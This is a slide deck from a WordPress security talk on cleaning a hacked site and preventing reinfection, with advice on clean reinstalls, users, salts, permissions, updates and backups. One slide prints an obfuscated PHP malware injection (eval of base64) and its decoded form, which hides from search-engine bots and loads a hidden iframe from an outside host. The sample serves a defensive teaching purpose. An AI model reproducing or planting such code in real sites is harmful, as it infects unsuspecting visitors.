Your Site Has Been Hacked, Now What?

Your Site Has Been Hacked, Now What?
Your Site Has Been Hacked, Now What? Michele Butcher CantSpeakGeek.com WPSecurityLock.com @Michele_Butcher Slides can be found at: http://mlb.pw/WCSD2015 @Michele_Butcher
WordPress Specialist at   WP Security Lock Head Geek at Can’t  Speak Geek Sometimes a designer of pretty   websites and graphics Southern Illinois Meetup Co-Organizer Beginners and Intermediate WordPress   Instructor at John A Logan College Michele Butcher @Michele_Butcher
It all starts one dreadful morning…… @Michele_Butcher
First you see this @Michele_Butcher
Then you realize this has happened @Michele_Butcher
Which made you feel like this… @Michele_Butcher
What do you do when your site gets hacked? @Michele_Butcher
First option: Pay someone else to clean it. There are many options out there who will clean your site. Here is who I suggest. WP Security Lock https://wpsecuritylock.com Sucuri Security http://sucuri.net/ @Michele_Butcher Hack Repair http://hackrepair.com
Second Option: Clean it yourself • Cheapest • Most time consuming • No one knows your site better than you do • You just have to know what to look for I do not suggest this if you are not comfortable reading HTML, PHP, and CSS. @Michele_Butcher
Pretty Code @Michele_Butcher
Not So Pretty Code <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX 2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJy wnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd 3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50Jywn YnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ld HNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZH J1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmV zaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGkn KTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1N SIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIi wgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJ yYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQu MjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguM TA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS 4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzM uMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4 LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44O C4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYX koIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU 1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwi NzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3M i4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCS k7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQp mb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxv bmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfa XAybG9uZyA +PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0K Zm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWR VJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn 0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB 4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3 WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY +JzsNCn0=')); @Michele_Butcher
<?php error_reporting(0); $bot = FALSE ; $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blog pulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon. de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image- resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api'); $stop_ips_masks = array( array("216.239.32.0","216.239.63.255"), array("64.68.80.0" ,"64.68.87.255" ), array("66.102.0.0", "66.102.15.255"), array("64.233.160.0","64.233.191.255"), array("66.249.64.0", "66.249.95.255"), array("72.14.192.0", "72.14.255.255"), array("209.85.128.0","209.85.255.255"), array("198.108.100.192","198.108.100.207"), array("173.194.0.0","173.194.255.255"), array("216.33.229.144","216.33.229.151"), array("216.33.229.160","216.33.229.167"), array("209.185.108.128","209.185.108.255"), array("216.109.75.80","216.109.75.95"), array("64.68.88.0","64.68.95.255"), array("64.68.64.64","64.68.64.127"), array("64.41.221.192","64.41.221.207"), array("74.125.0.0","74.125.255.255"), array("65.52.0.0","65.55.255.255"), array("74.6.0.0","74.6.255.255"), array("67.195.0.0","67.195.255.255"), array("72.30.0.0","72.30.255.255"), array("38.0.0.0","38.255.255.255") ); $my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR'])); foreach ( $stop_ips_masks as $IPs ) { $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1])); if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;} } foreach ($user_agent_to_filter as $bot_sign){ if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;} } if (!$bot) { echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/ QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>'; } @Michele_Butcher
When cleaning your site, add clean copies of core, your theme and your plugins. It makes cleaning so much easier. @Michele_Butcher
This is a good time to make an audit of everything on your site and delete what is not being used. You can always add other themes and plugins back later when you need it. @Michele_Butcher
Now you have all the malware removed, that does not mean we are done @Michele_Butcher
Change the salts in your wp-config.php file @Michele_Butcher
Check your users! • You could have unwanted users • Delete the unwanted guests immediately • if you use “admin” as a username, delete it and make a new user name • Delete all users that are no longer using your dashboard (Old devs, designers, guests) • Only give others the access they need, not what they want. A guest blogger should never be an admin, only a contributor. @Michele_Butcher
Check your FTP accounts on your server You could have unwanted users here as well @Michele_Butcher
Check your File Permissions Files should be 644 Directories should be 755 @Michele_Butcher
Add some Security to your site • iThemes Security or iThemes Security Pro • Jetpack (BruteProtect and VaultPress) • WordFence • Sucuri Firewall Some trusted plugins @Michele_Butcher
Change your login information • WordPress Logins and passwords • cPanel Logins and passwords • Database logins and passwords  (Remember to change them in your wp-config.php) • Hosting Logins and passwords @Michele_Butcher
When it comes to usernames and passwords, here are a few tips. • NEVER use “admin” as a username and “password”as the password. NEVER on anything! • The harder a password is to remember, the harder is to hack • Use something like LastPass, 1Password, or KeyPass to store your passwords @Michele_Butcher
What do you do to not get hacked again? @Michele_Butcher
First and most important! UPDATE  UPDATE  UPDATE Update core, update plugins, update themes! @Michele_Butcher
A note on updating If you use a theme and/or plugin that was purchased from Envato, Theme Forest, or Code Canyon please mark the box under each purchased item on the download page to be notified by email of updates. That is the only way they notify their customers of updates. This is part of the reason the RevSlider Soak Soak infection was so high. @Michele_Butcher
Pay attention to WordPress news and security sites • WP Tavern • WP Security Bloggers • Sucuri Blog • WP Security Lock • Advanced WordPress (Facebook) • Twitter @Michele_Butcher
Only use trusted and supported themes and plugins Do NOT use a theme or plugin • That has not been updated in more than a year • No one is responding in the support forums • If it shows that it does not work in the current version of core @Michele_Butcher
Start Making Backups • Backup Buddy • BackWPUp • VaultPress (Jetpack) • Check with your hosting company to see if they do backups as well • iThemes Security (free and Pro) will do database backups @Michele_Butcher
Speaking of backups… Save them somewhere other than your server. Most have options to send them to an Amazon S3 account, Dropbox, email, or download to your machine. @Michele_Butcher
Lastly, be active with your site. You know your site best. If something does not feel right, look into it. Also, do not ignore your website. No one likes a zombie website. @Michele_Butcher
And remember… @Michele_Butcher
Don’t Let Security Make You This Guy! @Michele_Butcher
Questions? @Michele_Butcher
Thank you! Michele Butcher http://CantSpeakGeek.com https:WPSecurityLock.com @Michele_Butcher Slides can be found at: http://mlb.pw/WCSD2015 @Michele_Butcher

Your Site Has Been Hacked, Now What?

Check these out next

Your Site Has Been Hacked, Now What?

Recommandé

Contenu connexe

Présentations pour vous(20)

En vedette(19)

Similaire à Your Site Has Been Hacked, Now What?(20)

Plus de Michele Butcher-Jones(20)

Dernier(20)

Your Site Has Been Hacked, Now What?